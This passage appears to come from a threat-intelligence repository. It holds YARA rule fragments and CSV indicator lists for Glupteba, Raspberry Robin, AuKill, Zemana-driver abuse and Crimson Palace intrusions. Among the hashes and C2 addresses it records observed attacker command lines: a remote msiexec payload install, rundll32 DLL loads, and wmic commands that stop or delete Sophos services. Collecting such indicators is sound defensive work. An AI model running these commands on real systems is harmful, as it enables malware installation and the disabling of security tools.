= /function [\w]{1,14}\(.{0,40}\){.{0,40};while \([\w]{1,20} < [23][\d]{3}\) {/ 15 | $a5 = /;WScript\.Sleep\([\d]{4,10}\);/ 16 | condition: 17 | all of ($a*) 18 | } 19 | 20 | -------------------------------------------------------------------------------- /Troj_Agent-BJJB.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note,,,,,, 2 | Description,IoCs related to signed drivers used to sabotage endpoint security products,https://news.sophos.com/en-us/2022/12/13/signed-driver-malware-moves-up-the-software-trust-chain,,,,,, 3 | sha256,0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc,"Malicious driver signed by Zhuhai liancheng Technology Co., Ltd.",,,,,, 4 | sha256,0d10c4b2f56364b475b60bd2933273c8b1ed2176353e59e65f968c61e93b7d99,Malicious driver signed by Windows Hardware Compatibility 
Publisher,,,,,, 5 | sha256,274340f7185a0cc047d82ecfb2cce5bd18764ee558b5227894565c2f9fe9f6ab,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 6 | sha256,42b22faa489b5de936db33f12184f6233198bdf851a18264d31210207827ba25,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 7 | sha256,5f6fec8f7890d032461b127332759c88a1b7360aa10c6bd38482572f59d2ba8b,Malicious driver signed by Beijing JoinHope Image Technology Ltd.,,,,,, 8 | sha256,601837510987c6ca31d755e12e7acbb80c541c4b1bd3fa01e9f518d0d024d6e0,Cuba ransomware DLL (a.dll) Troj/Ransom-GUI (not on VT),,,,,, 9 | sha256,64e23e15f4c57b6bd6e34250b099f2071307c402486b7fd6c9432a91fdb6eb59,driver loader (new_s.exe) Troj/AVKill-Q (not on VT),,,,,, 10 | sha256,6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 11 | sha256,7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 12 | sha256,8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 13 | sha256,9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c,"Malicious driver signed by Zhuhai liancheng Technology Co., Ltd.",,,,,, 14 | sha256,c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497,Malicious driver signed by Windows Hardware Compatibility Publisher,,,,,, 15 | sha256,d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c,Malicious driver signed by nVidia Corporation,,,,,, 16 | sha256,4f94155e5a1a30f7b05280dd5d62c3410bcc52aea03271d086afa5dc5d97e585,driver loader (new_s.exe) Troj/AVKill-Q (not on VT),,,,,, 17 | sha256,e8eec2c2be6abdef6987d4a5ad850f17b335db242d5657a6f47733bf6a03dc03,driver loader (new_s.exe) Troj/AVKill-Q (not on VT),,,,,, 18 | -------------------------------------------------------------------------------- /Trojan-Glupteba: 
-------------------------------------------------------------------------------- 1 | Indicator_Type,Data,Note 2 | Description,Indicators from the Glupteba malware report,https://news.sophos.com/en-us/2020/06/24/glupteba-report/ 3 | bitcoin_address,15y7dskU5TqNHXRtu5wzBpXdY5mT4RZNC6,previously used for C2 updates 4 | bitcoin_address,1CgPCp3E9399ZFodMnTSSvaf5TpGiym2N1 ,previously used for C2 updates 5 | command_line_parameter,/31337, 6 | command_line_parameter,/31339, 7 | command_line_parameter,/31340, 8 | domain,1.podcast.best, 9 | domain,anotheronedom.com,"C2 server, 2020-02-17" 10 | domain,bestblues.tech,CDN server (payloads) 11 | domain,easywbdesign.com,"C2 server, 2020-05-07" 12 | domain,gamedate.xyz,winboxscan.exe C2 server 13 | domain,getfixed.xyz,"C2 server, 2020-03-28" 14 | domain,gfixprice.xyz,"C2 server, 2020-03-28" 15 | domain,maxbook.space,"C2 server, 2020-05-13" 16 | domain,robotatten.com,"C2 server, 2020-01-24" 17 | domain,sleepingcontrol.com,"C2 server, 2020-02-14" 18 | domain,sndvoices.com,"C2 server, 2020-04-08" 19 | domain,whitecontroller.com,C2 server 20 | domain,myonetime.top,C2 server 21 | domain,venoxcontrol.com,"C2 server, 2019-06-19" 22 | domain_path,myonetime.top/w.php, 23 | file_path,%APPDATA%\EpicNet Inc\CloudNet, 24 | file_path,%TEMP%\csrss\, 25 | file_path,%TEMP%\csrss\smb\, 26 | file_path,%TEMP%\wup, 27 | file_path,%WINDIR%\rss, 28 | file_path,%WINDIR%\rss\csrss.exe, 29 | file_path,%WINDIR%\windefender.exe, 30 | file_path_name,"""%TEMP%\csrss", 31 | file_path_name,%APPDATA%\EpicNet Inc\CloudNet\cloudnet.exe, 32 | file_path_name,%TEMP%\app.exe, 33 | file_path_name,%WINDIR%\System32\drivers\Winmon.sys, 34 | file_path_name,%WINDIR%\System32\drivers\WinmonFS.sys, 35 | filename,cloudnet.exe, 36 | filename,dsefix.exe, 37 | filename,e7.exe, 38 | filename,windefender.exe, 39 | filename,Winmon.sys, 40 | filename,WinmonFS.sys, 41 | filename,WinmonFS32.sys, 42 | filename,WinmonFS64.sys, 43 | filename,WinmonProcessMonitor32.sys, 44 | 
filename,WinmonProcessMonitor64.sys, 45 | filename,WinmonSystemMonitor-10-64.sys, 46 | filename,WinmonSystemMonitor-7-10-32.sys, 47 | filename,WinmonSystemMonitor-7-64.sys, 48 | filename ,deps.zip, 49 | mutex,Global\h48yorbq6rm87zot, 50 | mutex,Global\Mp6c3Ygukx29GbDk , 51 | mutex,Global\nbyjrjaxyahi4pq5,Set by Winboxscan MikroTik router exploit tool 52 | mutex,Global\wupEvent31337, 53 | mutex,Global\xneEvent31337, 54 | mutex,Global\y7ze3fznx1u0yc2z, 55 | registry_path_key,HKEY_USERS\%s\Software\Microsoft\InstallKey,%s here refers to the user's SID under Windows 56 | registry_path_key,HKEY_USERS\%s\Software\Microsoft\RegisterAppOk ,%s here refers to the user's SID under Windows 57 | registry_path_key,HKEY_USERS\%s\Software\Microsoft\RegisterAppProcessing,%s here refers to the user's SID under Windows 58 | registry_path_key,HKEY_USERS\%s\Software\Microsoft\TestApp,%s here refers to the user's SID under Windows 59 | SHA-256,73fddd441a764e808ed6d6b8f3d0d13713e61221aa3cfef7da91cdaf112fe061,"deprecated, vulnerable VBoxDrv.sys driver version 1.6" 60 | SHA-256,414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 ,"DSEFix.exe (grey hat tool from https://github.com/hfiref0x/DSEFix, benign)" 61 | SHA-256,04d71e8af8b5cbec912b82b6ebef7c19c5b888873dfd4609b1e38b2a6c398b2e,watchdog.exe 62 | SHA-256,0b2a84359501923d1aa6ccd4e03b3f1b619e01d978efae45feea34a4d0ffed04,cloudnet.exe 63 | SHA-256,20e983e90144c385996eeb2edb584d654d898c34725e149682170f870ee12870,vc.exe 64 | SHA-256,407c70f0c1a1e34503dae74dd973cf037d607e3c4deb8f063d33f2142f1baf71,app.exe 65 | SHA-256,6b0d90a0571ec870fa26372a1c5d83d06e8febca130a8f710e0c389a3054e05c,routerdns.exe 66 | SHA-256,83bbe9e7b7967ecbc493f8ea40947184c6c7346c6084431fceea0401a6279d29,app.exe 67 | SHA-256,8d19c59db26a3e0a3251c5f05e143558bf009ed0b46fb9b6151f98441407ae8b,winboxscan-0502.exe 68 | SHA-256,5e541d1ab46ab3d58e4889b08f5f4427d38afe8320582a63d992eda172af6c7f,profile-0225.exe 69 | 
SHA-256,9e4f09faee3eba3ae271b241cbaf0cb3621845ef83608a8abb3df8791e6c36e1,d2.exe 70 | SHA-256,dec11036bca8384f81c0c1d534e1f37fd2864c974dad020f32b835af3c7c4e28,updateprofile.exe 71 | SHA-256,eb35bb221de38f5953f923cd349b4c85a50145329152a8aaa01e4cd8602a560e,cloudnet.exe 72 | SHA-256,469953521e9b64eac07f02fecf3488406c65ec1f3d5c182363c8ba0664a4b640,"patch.exe (grey hat tool from https://github.com/hfiref0x/UPGDSED, benign)" 73 | url,http://1.podcast.best/ru53332/,RTMD in URI 74 | url,http://capmusic.ru/ru53332/,RTMD in URI 75 | url,http://fundbook.xyz/ru53332/,No string ID in URI 76 | url,http://hotaction.online/ru53332/,No string ID in URI 77 | url,http://netoftime.com/ru53332/,RTMD in URI 78 | url,https://hotbooks.xyz/ru5555/,FMLD in URI 79 | url,https://infocarnames.ru/ru53332/,RTMD in URI 80 | url,https://maxbook.site/ru5555/,FMLD in URI 81 | url,https://setbird.website/ru53332/,RTMD in URI 82 | url_path,%s/upload/%s/samples/,%s here refers to the unique identifier the bot assigns to the infected host 83 | url_path,/api/cloudnet-url?, 84 | url_path,/api/install--failure, 85 | url_path,/api/router-scan-results-rand, 86 | url_path,/app/app.exe, 87 | url_path,/app/watchdog.exe?t=, 88 | url_path,/ru53332/, 89 | url_path,/ru5555/, 90 | -------------------------------------------------------------------------------- /Worm-Raspberry-Robin.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs related to recent Raspberry Robin infections, 3 | domain_port,5qY.ro:8080,Compromised QNAP server used for C2 4 | url_path,hxxp://5qY.ro:8080/y/cB36RUcKfQKp7SE/oolvooA/p8a/{redacted},URL path used for installation 5 | command_line,"C:\Windows\System32\rundll32.exe"" SHELL32 ShellExec_RunDLL regsvr32.exe -s ""C:\ProgramData\Wwhm\vsinzf.log","Example command to load DLL without odbccong, instead only using regsvr32 in a straightforward manner" 6 | command_line,RUNDLL32.EXE 
C:\ProgramData\EdgeProt\StqrtedRest\AM51edoos_x86.dll FXJooft_hhmme,Observed Raspberry Robin DLL commandline 7 | command_line,RUNDLL32.EXE C:\ProgramData\FilterBoard\NomorPrtfession\sdiabeft_Vibm02.dll Rqstfo_Web_Ryutclt,Observed Raspberry Robin DLL commandline 8 | command_line,"C:\Windows\system32\rundll32.EXE C:\ProgramData\GenericMicro\UriloFeatkres\mxiDaas_Pkrces.dll,ROUTnteh__1_0",Observed Raspberry Robin DLL commandline 9 | command_line,"C:\Windows\SysWOW64\RUNDLL32.EXE C:\ProgramData\WrapAlarm\EnqerprispSxory\tdawty_CredeDEAS.dll,Devce_AdmTxplEditxf_Resohrqeh",Observed Raspberry Robin DLL commandline 10 | command_line,"RUNDLL32.EXE C:\ProgramData\ComponentsImport\GutlookGate\ades_pbouril.dll,wmsksoft_PoCZ5",Observed Raspberry Robin DLL commandline 11 | command_line,C:\Windows\SysWOW64\RUNDLL32.EXE C:\ProgramData\GuardShade\UtilitdRlset\dpset_CXVR32.dll CFBBRw_wisdoker,Observed Raspberry Robin DLL commandline 12 | command_line,"msiEXEC UwAAbX=shmf WRdYMn=aFRmAyQL /q iUde=ODJhzS YDLyOBy=LteB YJbgE=HpiaCV /i""hxxP://5qY[.]Ro:8080/y/cB36RUcKfQKp7SE/oolvooA/p8a/{redacted}"" kFTIeNctT=InnOjRO",Example of Raspberry Robin installation command 13 | -------------------------------------------------------------------------------- /Zemana-driver-IoCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2024/03/04/itll-be-back-attackers-still-abusing-terminator-tool-and-variants,Observed IOCs for incidents involving Zemana drivers 3 | sha256,397eb84bfebb366c2719c02bbadfdf9de8ef608808d680c9f127f9a62ccca083,ter.exe 4 | sha256,6f55c148bb27c14408cf0f16f344abcd63539174ac855e510a42d78cfaec451c,Anti-Logger driver used by ter.exe 5 | ip,175[.]118[.]126[.]65,Server hosting malicious PowerShell script 6 | sha256,c3e6034ee65a1131068998399f110d0c944686683197b607c5598e9c09af1c39,Cryptominer installer 7 | 
sha256,6e2d85628ae37e57365ed59ac30371d86ab3b62acd5d0dfb6cbd0ccc6c4e5c1a,Ternimator.exe 8 | sha256,2bbc6b9dd5e6d0327250b32305be20c89b19b56d33a096522ee33f22d8c82ff1,Zam.sys used by Ternimator.exe 9 | sha256,c748b9054a97a00db5484a98b1841b3c92881c96989d492586206e0970be3b4b,Anti-Logger driver used in AuKill incident 10 | sha256,3c54646213638e7bd8d0538c28e414824f5eaf31faf19a40eec608179b1074f1,XMRig Miner 11 | ip_port,175[.]118[.]126[.]65:8002,Server hosting malicious PowerShell script 12 | url,hxxp://175[.]118[.]126[.]65:8002/js/wi.txt,Server hosting malicious PowerShell script 13 | command_line,"wmic service where \""PathName like '%sophos%'\"" call delete /nointeractive",Attempt to delete Sophos services 14 | command_line,"wmic service where \""PathName like '%sophos%'\"" call stopservice /nointeractive",Attempt to stop Sophos services 15 | file_path,%sysdir%\drivers\updatedrv.sys,updatedrv.sys (ZAL) 16 | file_path,\programdata\usoshared\updatedrv.sys,updatedrv.sys (ZAL) 17 | -------------------------------------------------------------------------------- /atk-backstab-d.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver,Indicators related to this research 3 | sha256,1934b4641ca540ac4fd39c37e6f8b6878ddf111b5c8eb2de26c842cb6bd7b9b8,AuKill v1. Build timestamp 11/13/2022 9:07:47 AM. Targets Sophos 4 | sha256,83a17f3fda45b00e34934ddd0d5ed72c479170cb39097938f07a5dc6e92068c3,AuKill v2. Build timestamp 11/29/2022 5:58:14 AM. Targets Sophos 5 | sha256,761330a5e5b16f27fef971e1f41d309ee9f5f158dd09e81b2b31cda6dafa59f0,AuKill v3. Build timestamp 12/14/2022 10:19:33 AM. Targets Sophos/ElasticSearch 6 | sha256,08a248de098e0f9edec425ce37d13c827eaf4c54c93182f4ddf1c5b3801cf540,AuKill v4. Build timestamp 2/6/2023 6:09:19 PM. 
Targets Sophos/Microsoft/Splashtop 7 | sha256,a780972312e2644f29555ec9275053eebce37befe038eabaeb783443209bc921,AuKill v5. Build timestamp 2/10/2023 9:59:47 PM. Targets Sophos/Microsoft/Aladdin HASP 8 | sha256,7bca36f037557b0f84412a666ef76dee8bfec1bc7754112b95f34634b8b72fed,AuKill v6. Build timestamp 2/11/2023 1:43:12 PM. Targets Sophos/Microsoft/Splashtop 9 | sha256,d579b1853c528e54464c2607e559591ee01b0ab75bc016c14de1c38068328a81,WindowsKernelExplorer.sys (64-bit driver that ships with the original tool) 10 | sha256,db0b5c434ddc7c97505a8be24431e9fbe484c2113df4ddf061aee91c35eab8b6,WindowsKernelExplorer.sys (32-bit driver that ships with the original tool) 11 | sha256,52b9a7b44154bbb9d81a581a7de4902b1c661559ea87803d9cb85339805bd6ca,WKE32.exe 12 | sha256,79357c9248aea61fa25f0641f2eeb13bb259da645ab2e8dd696b702ed4fa976b,WKE64.exe 13 | sha256,cdfbe62ef515546f1728189260d0bdf77167063b6dbb77f1db6ed8b61145a2bc,Process Explorer v16.32 driver (deprecated) 14 | file_path_name,c:\Windows\System32\drivers\PROCEXP.SYS,Process Explorer v16.32 driver (deprecated) 15 | file_path_name,c:\windows\system32\aSophos.exe,AuKill v2 path 16 | file_path_name,c:\windows\system32\aSophosX.exe,AuKill v3 path 17 | file_path_name,c:\windows\system32\auSophos.exe,AuKill v4 & v6 path 18 | file_path_name,c:\windows\TEMP\aBase.exe,AuKill v5 path 19 | registry_path,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSDriverSrv,AuKill v1 service key 20 | registry_path,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aSophos,AuKill v2 service key 21 | registry_path,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aSophosX,AuKill v3 service key 22 | registry_path,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\auSophos,AuKill v4 & v6 service key 23 | registry_path,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aBase,AuKill v5 service key 24 | -------------------------------------------------------------------------------- /crimson_palace_post-08-2023.csv: 
-------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | sha256,58a7be39056c2084bbb4aec9843db732dfe115ec4ee0c7cc4cf8884621b5142d,C:\ProgramData\mios.exe (Malicious File) used in conjunction with cmdline containing '172.19.120.60 65211' and '178.128.221.202 443' 3 | sha256,776d427a19d8389464f855b2f70e0ac11e896162a9f9b50bcb23f0f0aea5044f,C:\Windows\Help\Help\mscorsvc.dll (Malicious DLL) 4 | sha256,430bf24c9a7843895cb266b440c1f911ae600a7e6b8f3885d1c000622da52b2b,C:\ProgramData\mscorsvc.dll (Malicious DLL) 5 | sha256,a22b8ef40b8abe2bd7161f425484e82207f322fef1d0562de5bf98e2f642b477,"C:\Windows\Temp\ntpsapi.dll (EDR unhooking, benign version of ntdll.dll)" 6 | sha256,cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272,C:\windows\syswow64\WWindows.Data.Devices.Config.dll (SharpHound/BloodHound) 7 | sha256,e65645af3894ec55f0b55472302d288e860a10d97bc19b699facc400f778c4ee,locale.nlp (ATK/DonutLdr-A) 8 | sha256,fa7d4fb4b43e1672c7f4656cd4275c330c2e13aff8451d68e4f305e5e5aea395,C:\Windows\debug\net.LOG (Havoc) 9 | sha256,52e248b9fb32ac3aaa4be4b41c66f1e7d9f2d4605aae98f20584f21ea1f33202,swprv.dll (Malicious DLL sideloaded by swprv service) 10 | sha256,e5620b4b6371b786c72e830dc24012354642b7067bd5902da7073ce0421456b7,iscsiexe.dll (MSiSCSI payload) 11 | sha256,6d94049b24c6ac2373d3b517515fcaeeb392458342bbb5ad4c4316e124805b5b,version.dll (Malicious DLL sideloaded by swi_update.exe) 12 | file_path_name,c:\windows\help\help\tmdbglog.dll (,Malicious DLL sideloaded by PTWatchDog.exe 13 | sha256,3cc8e21798462468d3bc05ddef35a558fe0dff268c433d42bd01385155084f53,"DecrptDumper.exe (Malicious File, no execution data)" 14 | sha256,da9a53ff7486cf128e5ba80e66fcf3b1d8993d553bd9634ae8e90cbab31fd8da,c:\windows\help\prow.xml (Havoc) 15 | sha256,8b16a3a3047f0eb93ef2b55613a76a9f5f19506428895a5ffbb3c1c44780aad7,~docpdf.tmp (Havoc) 16 | sha256,75403191ee834075ab5334e92bda8aab267545a03ed5ed3508db36f21f4acf50,C:/PerfLogs/libcef.dll (Havoc) 17 | 
sha256,609fc96700f49f7fdfa71248e642a4dfcd8b3d35f6da3b7c2ce7daad25a844a9,DOC20231100001603KMAP.pdf (webshell) 18 | sha256,e4b7a1372233aef6d495743bb726fcd5037d4e90e043085498c21587335d36c7,C:/Windows/System32/wbem/ncobjapi.dll 19 | sha256,5f959f480a66a33d37d9a0ef6c8f7d0059625ca2a8ae9236b49b194733622655,DOC20231200001924KMAP.aspx 20 | sha256,bdcedd81555c9c2eb9f4329626c27ec8c7b91a0f2a9f6e0c55dbcd3f99e82b5d,111 (Shellcode loader) 21 | sha256,4995b91badc8f9bf549548a734d3c14fa2a1c21080743484028b5362440808a0,C:/Windows/Vss/Writers/Application/libcef.dll (Shellcode Loader for Havoc) 22 | sha256,4dd0debf03eeb938fbaca1f1fd391523358c23cbf18959a149c29133cc3c9cae,C:/Windows/Vss/Writers/Application/libcef.dll (Shellcode Loader for Havoc) 23 | sha256,101bf8dcdd414f09ba46cdecbd96e8606c79b0e76b6a2ce040395e775cb4da86,DOC20231200001922KMAP.asp (webshell) 24 | sha256,9ccf0e46f6aadbb20f4c269d8ac85cc9b4e6ce56bf226d45eda4347a20785c88,DOC20231200002062KMAP.php (webshell) 25 | sha256,1622ef497f2b767a43e25bcd9a9a629cbe7bed49cb27dc4f08fe0863730580d9,log.ini (Havoc) 26 | sha256,5f959f480a66a33d37d9a0ef6c8f7d0059625ca2a8ae9236b49b194733622655,DOC20231200001919KMAP.aspx (Webshell) 27 | sha256,101bf8dcdd414f09ba46cdecbd96e8606c79b0e76b6a2ce040395e775cb4da86,DOC20231200001923KMAP.asp (Webshell) 28 | sha256,5f959f480a66a33d37d9a0ef6c8f7d0059625ca2a8ae9236b49b194733622655,DOC20231200001924KMAP.pdf (Webshell) 29 | sha256,5298c1aadac203285c8a95a4e3f62ec14b984729bf768a405c8028291e34fe1b,1.exe (Invoke WMI) 30 | sha256,299b1e82f6941cc049a16c7854230fb37c97af32e2cf5cb335495f42446dc43f,"msedge_elf.dll (Shellcode Loader, Havoc)" 31 | sha256,c36173f28bfd99db86533d5fdb0ce4dd565488ca56d4b9df1997ee9201b3b704,"chrome.exe (Shellcode Loader, Havoc)" 32 | sha256,8d54da0f807d771edb1197e463cdff8848651e14745c4c468386c31953c340ff,"msedge_elf.dll (Shellcode Loader, Havoc)" 33 | sha256,71ccc2c30dc43f20833c3e54d1fe86f8b68263d876461a3f7f7f8702e92cbe81,C:/ProgramData/conhost.exe (Alcatraz Git Project EDR Evasion) 34 | 
sha256,d86790104f59b89edbdb1478f320d4589155d465d4710bcb57ff015383eefb38,C:\Windows\Vss\Writers\Application\libcef.dll 35 | sha256,2892aa48e12e72ba25c4caa9471b41ce316624ff98ed79f56e3c6b3a51026504,C:\Windows\Vss\Writers\libcef.dll 36 | file_path_name,C:\Windows\Vss\Writers\log.bin, 37 | sha256,2b7602cc1521101d116995e3e2ddfe0943349806378a0d40add81ba64e359b6c,C:\PerfLogs\vcruntime140.dll 38 | sha256,c6e1bf2b7ac0fd3c34761099d2ec17fccd0604e2e62e94f297943260d15368ce,C:\PerfLogs\jli.dll 39 | file_path_name,C:\Windows\Temp\temp.log, (Shellcode loader) 40 | sha256,b32de9f4f2a9bd08063c72fa84d5d44be5a3bf7859bfb6ceaf093cd03ff0240f,C:\PerfLogs\pt.exe (unsigned executable with certificate stating that it is MS Edge) 41 | sha256,f30b04a9ebc95c50fdc116260068d4d8da8005104b6366c29d0f24dbbf798957,C:\Users\Public\r2.exe (Unknown threat file) 42 | sha256,c36173f28bfd99db86533d5fdb0ce4dd565488ca56d4b9df1997ee9201b3b704,"C:\Users\Public\chrome.exe (Shellcode loader, WIN-PROT-VDL-MALWARE-ATK-SCLOAD-Q)" 43 | sha256,fbe0851792629f86b1d5a599a6bc29d82b3248462bebd8e47ee698e4f510308f,C:\PerfLogs\msedge_elf.dll 44 | ip,178.128.221.202,mios.exe C2 45 | domain,gsenergyspeedtest.com,Cobalt Strike C2 46 | ip,192.142.18.15,Interacted with webshell (VPN subnet) 47 | ip,192.142.18.27,Interacted with webshell (VPN subnet) 48 | ip,192.142.18.25,Dropped webshell (VPN subnet) 49 | domain,hpupdate.net,Havoc C2 50 | url,https://www.hpupdate.net/us-en/drivers/printers,Havoc C2 URI 51 | ip,45.15.143.151,Havoc C2 52 | ip,198.244.237.13,Havoc C2 payload host 53 | ip,123.253.35.100,swprv.dll C2 54 | domain,cancelle.net,swprv.dll C2 55 | domain,dmsz.org,swprv.dll C2 56 | domain,gandeste.net,swprv.dll C2 57 | ip,103.56.5.224,swprv.dll C2 58 | ip,49.157.28.114,swprv.dll C2 59 | ip,103.56.5.224,swprv.dll C2 60 | ip,141.136.44.219,Havoc C2 61 | ip,145.14.158.235,Havoc C2 62 | ip,107.148.41.114,Havoc C2 63 | ip,66.42.56.233,Havoc C2 / XiebroC2 64 | domain,test1.zhangliyong.cn,Havoc C2 / XiebroC2 65 | 
ip,191.96.53.132,Havoc C2 / XiebroC2 66 | ip,45.9.191.183,Havoc C2 / XiebroC2 67 | ip,64.176.50.42,Havoc C2 / XiebroC2 68 | ip,191.96.53.132,Havoc C2 69 | ip,45.77.46.245,Havoc C2 70 | ip,"64.176.37.107 71 | ",Havoc C2 -------------------------------------------------------------------------------- /crimson_palace_prior_intrusions.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | sha256,cca5ae87cd710a8fbf994addb0abc8bf1deb222214d4831289885de23ca98924,textinputhost.exe (renamed rc.exe) 3 | sha256,c1bec59afd3c6071b461bb480ff88ba7e36759a949f4850cc26f0c18e4c811a0,TextInputHost.dat 4 | sha256,f682323a2c543abbe12c21a77ee93b49444381fa33f76c67363c84764ca4c675,sc.cfg 5 | sha256,506b21588541243f3ddd5acb759bf20a3bf06fd2fea455066866154bc5e59721,appmgmt.dll (Stowaway) 6 | sha256,4ae29b8124f6221dab934ac04afed2acc8b17c6b35120d568bad8658cbca01c6,check.exe (NUPAKAGE) 7 | sha256,56F0C8047203147D9B9A888EBAC8F33B14AE198182A13913A0F93652DFE2052A,appmgmt.dll (Stowaway) 8 | sha256,b708dd11942c3e87a8987bdf83f7ea603425ae75fc25a306f54f1087df4198b4,swprvs.dll 9 | sha256,f830c3771d35237b4a63b946d7a0d187f5aaa4240e965d74070b7d72b6fba210,winbridge.dll -------------------------------------------------------------------------------- /crimson_palace_stac1248-alpha.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes,,,, 2 | sha256,110c5eec940f3abb8b3a671cd292bc9ef65772168325a7949290e9828353824a,sslwnd64.exe (PhantomNet),,,, 3 | sha256,e9cb02690d987de8d392d0e24b3ccbb294c751dff73962135913c7ec0d8a8064,sslwnd64.exe (PhantomNet),,,, 4 | sha256,c1abc254d231574044ffe7bdd030be04618916f255396197f1151bfec98c04b6,nethood.exe (PhantomNet),,,, 5 | sha256,e8cd237ac43fa0505d858ac8eb800020eeca104a1cd931d3b6d0ef656ee5393d,oci.dll (PhantomNet),,,, 6 | sha256,173bb620ed2eee6b356e128da88e173eb1b69253ecd616f8f984087688c089fd,"X64.dll (PhantomNet, renamed to oci.dll)",,,, 7 | 
sha256,c06065d3de3bfb37168a5d94baf1c675f831a201937ef774a36c2ea2bf6fc49e,wlbsctrl.dll (EAGERBEE),,,, 8 | sha256,b05b92fd84cc3e3bd6378cadbe9b8b2cb926c42383e6194be1df44d1b9202fc1,TSVIPSrv.dll (EAGERBEE),,,, 9 | sha256,951c7f8fdb6cfc8b362615ab1eec4a07dc8fccfd3a7ecda8255908a93b6a1f21,TSVIPSrv.dll (EAGERBEE),,,, 10 | sha256,01544aeb502163c4fb7bac483430059183ce3d11aee78cd4a6c7074c5289540e,C:\ProgramData\Microsoft\DeviceSync\jli.dll (EAGERBEE),,,, 11 | sha256,47c4a62fe75aa62906f0b110668e17947e905a33759100de21b987879b47183b,C:\ProgramData\Microsoft\Vault\vmnat.dll (Merlin),,,, 12 | sha256,7ed44a0e548ba9a3adc1eb4fbf49e773bd9c932f95efc13a092af5bed30d3595,pc2msupp.dll (Malicious DLL sideloaded by MOBPOPUP.exe),,,, 13 | sha256,f499f8d9584e5f4474b19324b807a38fec1c1d38d5df2ff4c1e16798311bc25b,MSI64.exe (RUDEBIRD),,,, 14 | sha256,68ee8c2209641a6796e06caa115effcb89f722a5737210b5bebb87a36e5141a8,ba0oddof.dll (CSC compilation artifact from 1.ps1 execution),,,, 15 | sha256,9404f51ccaf4165e6add08344f04b90ae79a045814d6b1de6b6c1e30981faa78,SophosUD.exe (PowHeartBeat),,,, 16 | sha256,0e010a36ff24299592569f7c3fc01c597e158996d94b66eb3bbf757742663e76,SophosUD.exe (PowHeartBeat),,,, 17 | sha256,1b97afb3310b3af944f74c2d715c110cec32ec536c0a9837b8c88df3438b2a63,SophosUD2.exe (PowHeartBeat),,,, 18 | sha256,2a662b58f1dd229e7dba923a4d123658e3c10c0cfcec03748fbe577db81db34d,SensAPI.dll (Malicious DLL sideloaded by ph.exe),,,, 19 | sha256,bbc0fe549a9e902528a125abd13b1f7c53746416d9c9bb91f88877f37a4ce11c,"C:\ProgramData\Microsoft\Windows\svcchost.dll (Malicious DLL sideloaded by renamed vmnat.exe, svcchost.exe)",,,, 20 | domain,cloud.keepasses.com,Merlin C2,,,, 21 | ip,89.44.197.74,Merlin C2,,,, 22 | domain,scancenter.trendrealtime.com,RUDEBIRD C2,,,, 23 | ip,185.195.237.123,RUDEBIRD C2; EAGERBEE C2,,,, 24 | ip,195.123.247.50,RUDEBIRD C2,,,, 25 | ip,172.67.130.71,PhantomNet C2,,,, 26 | ip,45.90.58.103,PhantomNet C2; RUDEBIRD C2,,,, 27 | ip,185.195.237.121,PhantomNet C2,,,, 28 | ip,104.21.3.57,PhantomNet 
C2,,,, 29 | ip,185.82.217.164,PhantomNet C2,,,, 30 | ip,195.123.245.79,PhantomNet C2,,,, 31 | ip,associate.feedfoodconcerning.info,PhantomNet C2,,,, 32 | ip,associate.freeonlinelearningtech.com,PhantomNet C2,,,, 33 | ip,msudapis.info,PowHeartBeat C2,,,, 34 | ip,154.39.137.29,PowHeartBeat C2,,,, 35 | ip,147.139.47.141,PowHeartBeat C2,,,, 36 | ip,185.167.116.30,PhantomNet C2; EAGERBEE C2,,,, 37 | ip,associate.freeonlinelearning.com,EAGERBEE C2,,,, 38 | ip,91.220.202.143,EAGERBEE C2,,,, 39 | ip,139.162.18.97,dllhost.exe,,,, 40 | -------------------------------------------------------------------------------- /crimson_palace_stac1305_charlie.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes, 2 | sha256,f788d5c2c1bb2d88db09b727b3841155daf43ba81802b5faffec72640451fa4f,tpyrced_ambs.exe, 3 | sha256,ad346007f28c4b6d409c95f55e750e249db4b168cd7061baa128f826df948e10,443.txt (PocoProxy), 4 | sha256,1ad26a31c5387055610e053dbab8355e1371f89dfa37526f7a3341122526b719,4413.txt (PocoProxy), 5 | sha256,91f40e8659da3dbbb22497b317aa37f26403be86662e359ecddcb4a0c72e154c,chrome.log (PocoProxy), 6 | filename,aaaa.txt,PocoProxy, 7 | sha256,7d6209036d370dbce7a0657f35dedeaa59c15fcfb4d696b9ebdd0fcc773dad50,a8.txt (PocoProxy), 8 | sha256,34294ff52899a63f2dc02e5a8f1488343afdb9702437d409a0869317ccfb4243,s.dat (Malicious file), 9 | 